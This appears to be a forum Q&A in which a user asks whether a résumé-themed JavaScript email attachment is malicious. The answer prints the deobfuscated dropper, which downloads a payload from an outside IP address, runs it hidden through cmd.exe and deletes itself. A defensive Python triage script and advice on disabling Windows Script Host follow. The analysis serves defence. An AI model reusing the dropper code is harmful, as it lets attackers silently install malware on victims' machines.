How can I know if there is a javascript virus?

Asked by AndrewJenkins in Java on Mar 10, 2022

So I got a random email saying this. Looks very automated:

"How are things? I was visiting your website on 4/9/2016 and I'm very interested. I'm currently looking for work either full time or as an intern to get experience in the field. Please review my Resume and let me know what you think."


Then a JavaScript file was attached. I scanned it on VirusTotal, which found only 1/55. I have opened the file to look at the text and have copy-pasted it into this dump file, as it is quite long. Can anyone familiar with JavaScript confirm whether or not it is a virus?

Answered by Amit raj

It most certainly is a JavaScript virus. It uses JavaScript with ActiveX and VBScript to download and execute a stage-two payload that does something else. Although it is written in JavaScript, it is not executed in the browser. Instead, it is executed by the Windows Script Host when it is double-clicked. This is the deobfuscated and abridged version of the function sQl dib from the file:


// download and execute stage 2 payload
function stage1_payload() {
    // connect to server hosting stage 2 payload and download into memory
    var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
    http_obj['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    http_obj['send']();
    // evaluates true only if http connection succeeded
    if (http_obj['Status'] == 200) {
        // open activex objects for filesystem and file access
        var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
        var file_obj = new ActiveXObject("ADODB.Stream");
        // create and open temporary file (as binary) in system temporary folder
        var temp_file = fs_obj['GetSpecialFolder'](2) + '' + fs_obj['GetTempName']();
        file_obj['Open']();
        file_obj['Type'] = 1;
        // save response body containing stage 2 payload to temporary file
        file_obj['Write'](http_obj['ResponseBody']);
        file_obj['Position'] = 0;
        file_obj['SaveToFile'](temp_file);
        file_obj['Close']();
        // execute temporary file using command prompt
        var shell_obj = new ActiveXObject("WScript.Shell");
        shell_obj['run']('cmd.exe /c ' + temp_file, 0);
    }
    // delete currently-executing script (the js file you received)
    var script_name = WScript['ScriptFullName'];
    fs_obj['deleteFile'](script_name);
}
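
For anyone who wants to check an attachment like this without running it, here is a small static triage script. It is an added example, not code from the question, the answer, or the malicious file: it normalises the obj['Member'] bracket notation the dropper uses to hide method names, then looks for the chain the answer describes (an ActiveX HTTP client, ADODB.Stream saved to disk, and WScript.Shell running the result, plus the self-delete via ScriptFullName). The COM ProgIDs it matches are real; the sample inputs are constructed with a placeholder URL, and the scoring thresholds are an assumption for illustration.

```python
"""Static triage for a suspected Windows Script Host (WSH) dropper.

Added example, not the original file or the answer's code. It scores a
script for the download -> write-to-disk -> run chain after undoing
obj['Member'] bracket access. Real COM ProgIDs; constructed samples;
the verdict rules are an assumption for illustration.
"""
import re
import sys
from dataclasses import dataclass

# obj['Member'] or obj["Member"]  ->  obj.Member
BRACKET_ACCESS = re.compile(r"\[\s*(['\"])([A-Za-z_]\w*)\1\s*\]")

# Matched case-insensitively: COM dispatch in WSH ignores case, which is
# why the dropper can write ['run'] instead of .Run and still work.
INDICATORS = {
    "http_client":  r"ActiveXObject\(\s*['\"](?:MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest)",
    "stream_write": r"ActiveXObject\(\s*['\"]ADODB\.Stream",
    "save_to_disk": r"\.SaveToFile\s*\(",
    "shell_object": r"ActiveXObject\(\s*['\"](?:WScript\.Shell|Shell\.Application)",
    "run_call":     r"\.(?:Run|ShellExecute|Exec)\s*\(",
    "self_delete":  r"\.ScriptFullName\b",
    "url_literal":  r"https?://[^\s'\"]+",
}


@dataclass
class TriageResult:
    verdict: str   # "dropper", "suspicious" or "clean"
    hits: dict     # indicator name -> match count
    urls: list     # URL literals found: candidate stage-2 hosts to block


def normalize(script: str) -> str:
    """Rewrite bracket member access as dot access so indicators match."""
    return BRACKET_ACCESS.sub(r".\2", script)


def triage(script: str) -> TriageResult:
    text = normalize(script)
    hits = {name: len(re.findall(pat, text, re.IGNORECASE))
            for name, pat in INDICATORS.items()}
    urls = re.findall(INDICATORS["url_literal"], text, re.IGNORECASE)

    # The full chain: fetch over HTTP, write the body to disk, run it.
    chain = (hits["http_client"] > 0,
             hits["stream_write"] > 0 or hits["save_to_disk"] > 0,
             hits["shell_object"] > 0 and hits["run_call"] > 0)
    if all(chain):
        verdict = "dropper"
    elif any(hits[k] for k in ("http_client", "stream_write", "shell_object", "self_delete")):
        verdict = "suspicious"   # one link of the chain on its own
    else:
        verdict = "clean"
    return TriageResult(verdict, hits, urls)


# Constructed sample mirroring the shape of the answer's snippet; the URL
# and paths are placeholders, not values from the original file.
SAMPLE_DROPPER = r"""
var h = new ActiveXObject("MSXML2.XMLHTTP");
h['open']("GET", "http://example.invalid/stage2.bin", false);
h['send']();
if (h['Status'] == 200) {
    var s = new ActiveXObject("ADODB.Stream");
    s['Open'](); s['Type'] = 1; s['Write'](h['ResponseBody']);
    s['SaveToFile']("C:\\Temp\\x.tmp"); s['Close']();
    var sh = new ActiveXObject("WScript.Shell");
    sh['run']('cmd.exe /c C:\\Temp\\x.tmp', 0);
}
var me = WScript['ScriptFullName'];
"""

# Constructed benign sample: ordinary browser-side JavaScript.
SAMPLE_BENIGN = r"""
function greet(name) { return "Hello, " + name; }
document.getElementById("out").textContent = greet("world");
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_DROPPER
    result = triage(source)
    print("verdict:", result.verdict)
    for name, count in result.hits.items():
        if count:
            print(f"  {name}: {count}")
    for url in result.urls:
        print("  url:", url)
```

Run it as `python wsh_triage.py suspect.js` (the file name is mine). A "dropper" verdict with a URL in the output gives you the stage-two host to block at the proxy or mail gateway, and the file itself is worth keeping as evidence rather than opening. Since the real damage here comes from Windows Script Host, not the browser, the practical prevention for mail-delivered .js attachments is to make .js/.jse open in Notepad instead of wscript.exe, or to disable WSH outright by setting the Enabled value under the Windows Script Host Settings registry key to 0.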

